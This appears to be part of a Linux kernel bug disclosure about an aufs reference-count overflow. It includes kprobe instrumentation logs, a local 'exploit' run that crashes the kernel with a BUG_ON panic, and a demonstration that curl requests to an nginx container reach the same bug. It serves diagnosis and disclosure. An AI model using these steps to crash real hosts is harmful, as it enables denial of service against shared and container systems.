Problem Demonstration / Instrumentation: --------------------------------------- This kprobe kernel module ("kmod-kprobe-fput.c") inserts a probe on __fput(), and prints the i_readcount value before before decrementing it, when a specified filename is found. (usage/steps on header comments.) $ sudo insmod kmod-kprobe-fput.ko [ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0) The i_readcount value is only incremeted on reads, not writes: $ touch test [ 308.193058] file: test, fs type: ext4, inode readcount: 0 $ > test [ 310.293847] file: test, fs type: ext4, inode readcount: 0 $ cat test [ 312.667149] file: test, fs type: ext4, inode readcount: 1 $ cat test [ 317.312413] file: test, fs type: ext4, inode readcount: 1 $ cat test [ 319.223841] file: test, fs type: ext4, inode readcount: 1 It is decremented only when the file is closed: $ tail -f test & $ tail -f test & $ tail -f test & $ cat test [ 365.042632] file: test, fs type: ext4, inode readcount: 4 $ kill %% [ 372.241224] file: test, fs type: ext4, inode readcount: 3 $ kill %% [ 376.151455] file: test, fs type: ext4, inode readcount: 2 $ kill %% [ 378.802151] file: test, fs type: ext4, inode readcount: 1 With aufs, there are 2 files/inodes, one in the virtual/aufs filesystem, another in the (underlying) real/ext4 filesystem. Then aufs handles/redirects the open/read/write calls to it. $ mkdir dir mnt $ touch dir/test $ sudo mount -t aufs -o br=dir none mnt $ ls mnt test The problem is observable upfront: i_readcount for the real inode/filesystem is extra incremented on the read-only open. $ cat mnt/test [ 453.819165] file: test, fs type: aufs, inode readcount: 1 [ 453.819226] file: test, fs type: ext4, inode readcount: 2 $ cat mnt/test [ 458.091550] file: test, fs type: aufs, inode readcount: 1 [ 458.091599] file: test, fs type: ext4, inode readcount: 3 $ cat mnt/test [ 463.165711] file: test, fs type: aufs, inode readcount: 1 [ 463.165759] file: test, fs type: ext4, inode readcount: 4 Compare that with the non-aufs/ext4-only output above for multiple cats ;-) - the inode's i_readcount on ext4 grows. ... That kprobe was enabled during the 'Exploit / Local' run. The logs show the i_readcount value incrementing until it overflowed, when the BUG_ON()/panic happened, and crashed. (The 'multiple' parameter only prints when i_readcount is a multiple of its value, in unsigned type.) $ sudo insmod kmod-kprobe-fput.ko multiple=100000 [ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000) $ cd mnt && /tmp/exploit [ 1799.795277] file: test, fs type: ext4, inode readcount: 100000 [ 1800.420418] file: test, fs type: ext4, inode readcount: 200000 [ 1801.030687] file: test, fs type: ext4, inode readcount: 300000 ... [ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000 ... [ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000 ... [14191.533372] file: test, fs type: ext4, inode readcount: 2000000000 ... [15156.688678] file: test, fs type: ext4, inode readcount: 2147400000 [15157.432852] file: test, fs type: ext4, inode readcount: -2147451616 ... [16123.045186] file: test, fs type: ext4, inode readcount: -2000051616 ... [22655.214420] file: test, fs type: ext4, inode readcount: -1000051616 ... [28517.303066] file: test, fs type: ext4, inode readcount: -100051616 ... [29161.058111] file: test, fs type: ext4, inode readcount: -1051616 [29161.702771] file: test, fs type: ext4, inode readcount: -951616 [29162.337571] file: test, fs type: ext4, inode readcount: -851616 [29162.980385] file: test, fs type: ext4, inode readcount: -751616 [29163.614763] file: test, fs type: ext4, inode readcount: -651616 [29164.253970] file: test, fs type: ext4, inode readcount: -551616 [29164.890793] file: test, fs type: ext4, inode readcount: -451616 [29165.566457] file: test, fs type: ext4, inode readcount: -351616 [29166.224213] file: test, fs type: ext4, inode readcount: -251616 [29166.879175] file: test, fs type: ext4, inode readcount: -151616 [29167.528966] file: test, fs type: ext4, inode readcount: -51616 [29167.862871] file: test, fs type: ext4, inode readcount: 0 [29167.864633] ------------[ cut here ]------------ [29167.866016] kernel BUG at include/linux/fs.h:2963! [29167.867423] invalid opcode: 0000 [#1] SMP PTI [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 [29167.873202] RIP: 0010:__fput+0x25d/0x260 ... [29167.901583] Call Trace: [29167.902387] ____fput+0xe/0x10 [29167.903344] task_work_run+0x8f/0xb0 [29167.904420] exit_to_usermode_loop+0x131/0x160 [29167.905749] do_syscall_64+0x163/0x190 [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9 ... [29167.967808] Kernel panic - not syncing: Fatal exception Example of Web Server / nginx with Kubernetes -- The same i_readcount() increments are obtained to the 'index.html' page served by nginx, as that is stored in the container image, thus accessed via aufs. (After deploying Kubernetes/Docker with aufs storage driver) Start nginx pod/container: $ kubectl run web-server --image=nginx Get its IP address: $ kubectl get pods -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES web-server 1/1 Running 0 48s 10.10.0.4 sf244755-focal Test it: $ curl -s 10.10.0.4 | grep title Welcome to nginx! $ sudo insmod kmod-kprobe-fput.ko filename=index.html [ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0) $ curl -s 10.10.0.4 >/dev/null [ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1 [ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7 $ curl -s 10.10.0.4 >/dev/null [ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1 [ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8 $ curl -s 10.10.0.4 >/dev/null [ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1 [ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9 And the web server can be exposed/made available externally, for example: $ kubectl expose pod web-server --port 80 --type NodePort $ kubectl get services web-server NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE web-server NodePort 10.100.0.69 80:32089/TCP 6s another-host$ curl -s 192.168.122.151:32089 | grep title Welcome to nginx! [ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1 [ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10